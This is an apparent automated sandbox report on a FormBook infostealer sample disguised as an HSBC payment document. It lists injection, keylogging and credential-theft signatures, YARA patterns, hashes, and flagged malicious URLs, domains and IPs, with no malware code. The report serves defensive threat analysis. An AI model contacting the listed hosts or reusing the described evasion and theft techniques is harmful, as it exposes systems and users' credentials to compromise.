Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HSBCscancopy-invoice778483-payment87476MT103.exe

Overview

General Information

Sample name:HSBCscancopy-invoice778483-payment87476MT103.exe
Analysis ID:1466744
MD5:15125bd7f04e0129ceebb7781f7051d2
SHA1:d06ac0fc49a473fafac1069ebe195edd6996cec1
SHA256:e5f5e88e8becfe092d10a927f72f580fd3a98612989a69a1f6df309f32b169f6
Tags:exeHSBC
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • HSBCscancopy-invoice778483-payment87476MT103.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe" MD5: 15125BD7F04E0129CEEBB7781F7051D2)
    • svchost.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UTbMqukHxZGmxEZNWddXnDURe.exe (PID: 832 cmdline: "C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rundll32.exe (PID: 8140 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • UTbMqukHxZGmxEZNWddXnDURe.exe (PID: 1164 cmdline: "C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7272 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ae70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1443f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x82409:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x6b9d8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d5d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16ba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e3d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Rundll32 Execution Without CommandLine Parameters
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe" , ParentImage: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe, ParentProcessId: 832, ParentProcessName: UTbMqukHxZGmxEZNWddXnDURe.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 8140, ProcessName: rundll32.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", CommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", ParentImage: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe, ParentProcessId: 7456, ParentProcessName: HSBCscancopy-invoice778483-payment87476MT103.exe, ProcessCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", ProcessId: 7508, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", CommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", ParentImage: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe, ParentProcessId: 7456, ParentProcessName: HSBCscancopy-invoice778483-payment87476MT103.exe, ProcessCommandLine: "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe", ProcessId: 7508, ProcessName: svchost.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.778981.com/i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxUAvira URL Cloud: Label: malware
            Source: http://www.778981.com/i74x/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeReversingLabs: Detection: 36%
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeVirustotal: Detection: 37%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeJoe Sandbox ML: detected
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3713104067.000000000051E000.00000002.00000001.01000000.00000005.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000000.1591634837.000000000051E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EE4696
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EEC9C7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEC93C FindFirstFileW,FindClose,0_2_00EEC93C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF200
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF35D
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEF65E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3A2B
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3D4E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEBF27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027CC160 FindFirstFileW,FindNextFileW,FindClose,11_2_027CC160
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then xor eax, eax11_2_027B96E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov ebx, 00000004h11_2_0474053E

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.hawalaz.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.213.72 162.0.213.72
            Source: Joe Sandbox ViewIP Address: 217.116.0.191 217.116.0.191
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00EF25E2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: F-WEBDate: Wed, 03 Jul 2024 08:53:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1127Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1439477166Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96eFAI-W-AGENT_AID: 23934566Update-Time: 1718640911Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenVary: Accept-EncodingSet-Cookie: _cliid=rI3wa6P8mig-JsqP; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:17 GMT; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a 98 f8 3d 6e ab 0b 65 0c 25 05 7f 2d a5 06 43 d0 9d bb 42 1d cc cc 2e e5 9c 86 a6 43 03 ca 6c 58 c0 35 79 34 02 12 61 33 8b 57 97 80 35 42 63 db 4e a7 53 88 a2 64 b2 21 a1 01 71 0b b7 f2 d4 39 91 02 b6 f4 2a 63 57 2b cb 94 7a fa 94 a9 19 60 8f db 95 fa f5 46 8c 5c 97 44 be c9 69 6c 57 15 be 6c c5 96 4a 01 5c ac af 2e ab f2 cc d9 2c 56 97 96 ba d5 1c 5c d6 0e 19 a0 65 1d 90 d2 3a 93 3e 53 1e 32 ae 02 ce 58 1d cf f3 1a 73 44 f3 56 e4 d1 d0 1c e6 89 26 d7 35 c5 60 1a 15 94 30 63 94 6d 86 7e 86 af 5a d3 f0 55 d2 82 65 08 e5 1d 05 12 0a 65 b4 a1 cf 82 b7 af 59 d6 dd fb 25 0f 91 64 90 88 f0 a1 45 42 e4 63 4b c5 97 e7 3b 24 f4 ef 74 fd 52 1c f9 d7 de 81 88 9a 0c c7 18 71 19 0c 4c 95 75 6f 82 2a 4c fc 71 8f 2d 2d 6b 90 a0 32 5d a4 ca 05 2d 25 7a aa dc a9 77 36 20 d3 41 b1 Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$t
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: F-WEBDate: Wed, 03 Jul 2024 08:53:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1127Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1439662166Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96eFAI-W-AGENT_AID: 23934566Update-Time: 1718640911Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenVary: Accept-EncodingSet-Cookie: _cliid=2-p6tn4e7V9He5fR; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:20 GMT; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a 98 f8 3d 6e ab 0b 65 0c 25 05 7f 2d a5 06 43 d0 9d bb 42 1d cc cc 2e e5 9c 86 a6 43 03 ca 6c 58 c0 35 79 34 02 12 61 33 8b 57 97 80 35 42 63 db 4e a7 53 88 a2 64 b2 21 a1 01 71 0b b7 f2 d4 39 91 02 b6 f4 2a 63 57 2b cb 94 7a fa 94 a9 19 60 8f db 95 fa f5 46 8c 5c 97 44 be c9 69 6c 57 15 be 6c c5 96 4a 01 5c ac af 2e ab f2 cc d9 2c 56 97 96 ba d5 1c 5c d6 0e 19 a0 65 1d 90 d2 3a 93 3e 53 1e 32 ae 02 ce 58 1d cf f3 1a 73 44 f3 56 e4 d1 d0 1c e6 89 26 d7 35 c5 60 1a 15 94 30 63 94 6d 86 7e 86 af 5a d3 f0 55 d2 82 65 08 e5 1d 05 12 0a 65 b4 a1 cf 82 b7 af 59 d6 dd fb 25 0f 91 64 90 88 f0 a1 45 42 e4 63 4b c5 97 e7 3b 24 f4 ef 74 fd 52 1c f9 d7 de 81 88 9a 0c c7 18 71 19 0c 4c 95 75 6f 82 2a 4c fc 71 8f 2d 2d 6b 90 a0 32 5d a4 ca 05 2d 25 7a aa dc a9 77 36 20 d3 41 b1 Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$t
